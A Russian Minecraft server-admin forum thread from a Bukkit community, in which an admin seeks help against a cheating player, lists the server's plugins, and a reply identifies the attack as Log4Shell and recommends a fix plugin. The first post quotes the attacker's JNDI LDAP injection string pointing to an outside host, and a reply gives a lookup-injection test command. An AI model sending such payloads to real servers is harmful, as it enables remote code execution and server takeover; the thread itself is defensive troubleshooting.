Хостинг серверов Minecraft playvds.com
  1. Вы находитесь в русском сообществе Bukkit. Мы - администраторы серверов Minecraft, разрабатываем собственные плагины и переводим на русский язык плагины наших собратьев из других стран.
    Скрыть объявление

Помогите Лазейки и фичи в бесплатных плагинах

Тема в разделе "Помощь", создана пользователем Nemnogo_idiot, 20 фев 2022.

  1. Автор темы
    Nemnogo_idiot

    Nemnogo_idiot Ньюби

    Баллы:
    1
    Тема такая, прошу вас сильно мне помочь, у нас есть сервер как все уже поняли и после захода человека который смог обойти NoCheat+ и летать без доната в хабе и на сервере он начал откисать (но мы его забанили конечно сразу, но не прекратилось), атак ботами или как такового ддоса не было ни в консоли, нигде. Всё по цп озу стабильно, tps gc в норме но иногда сильно просаживались, он написал что он якобы разработчик и знает про плагины, получается в них есть дыра? Могли бы вы скинуть дыры в плагинах либо помочь как знаете, просто всё и стабильно но иногда серваку плохо, что убрать что заменить?
    Список:
    PluginConstructorAPI, PlaceholderAPI, Spicord, UltimateAutoRestart, PlugMan, BetterChairs, MegaVanish, DynPad, Holograms, CommandPlayTime, DonatCase, RogueParkour, UltraEmerald, SuperTrails, MineTimesFilter, ViaVersion, HideStream, ViaBackwards, X-TimePass, LuckPerms, RainbowArmour, EasyPayments, ClearLag, CrackShot, WorldBorder, BlockSyntax, MineMessage, Clans, ProtocolLib, HamsterAPI, NoCheatPlus, SecondThreadAPI, FastAsyncWorldEdit, iDisguise, DrugsFTW, PrefiX, KNotlhosApi, Panilla, ExploitFixer, SimpleJail, CustomJoinItems, PlugManX, Tops, Vault, SimpleSit, BetterCaptcha, ViaRewind, ChatGames, DrinksCMD, SGranter, Marriage, SkinsRestorer, AuctionHouse, Images, ChestCommands, GCoreLegacy, SystemBord, WorldEdit, Essentials, CommandBlocker, AdvancedBan, Elevator, BanAnnouncer, DecoHeads, ItemFixer, BannerMaker, TimeIsMoney, TAB, ChatEx, MineResetLite, mKing, WorldGuard, GSlotMachine, EssentialsProtect, BanItem, EssentialsSpawn, PvPManager, TitleManager, FrameProtect, LimitedWorldEdit, RandomTP, Citizens, MoneyHunters, WGExtender, PiggyBack, AntiRelog, aLuckyBlock, CommandNPC, Blacksmith, dtlTraders
    Upd1- Написал что использовал ${jndi:ldap://2448382079:1389/a} либо просто похожее
     
    Последнее редактирование: 21 фев 2022
  2. Хостинг MineCraft
    <
  3. Pelmeshik

    Pelmeshik Активный участник Пользователь

    Баллы:
    78
    На счёт upd1 это Log4shell уязвимость. Надо билд ядра обновлять и поставить плагин https://github.com/FrankHeijden/Log4jFix/releases/tag/v1.0.5 . Это уязвимость библиотеки которая используется в ядре и она опасна те что могут завладеть и компами игроков так и самим сервером
     
    Nemnogo_idiot нравится это.
  4. Pelmeshik

    Pelmeshik Активный участник Пользователь

    Баллы:
    78
    Проверить действует ли эта уязвимость можна командой /say ${date:YYYY} если в консоле выводит год значит уязвимость есть, если нет то нет
     
    Nemnogo_idiot нравится это.
  5. Автор темы
    Nemnogo_idiot

    Nemnogo_idiot Ньюби

    Баллы:
    1
    Спасибо, но вот написало что уязвимости нету но он всё равно это делает, да и + он может дюпать 64 всего и головы себе брать когда они обычно ограничиваются либо пропадают (он без гм).
     
  6. Pelmeshik

    Pelmeshik Активный участник Пользователь

    Баллы:
    78
    Эта команда не 100% процентов говорит. Лучше всё же установить плагин https://github.com/FrankHeijden/Log4jFix/releases/tag/v1.0.5
     
    Nemnogo_idiot нравится это.
  7. Автор темы
    Nemnogo_idiot

    Nemnogo_idiot Ньюби

    Баллы:
    1

Поделиться этой страницей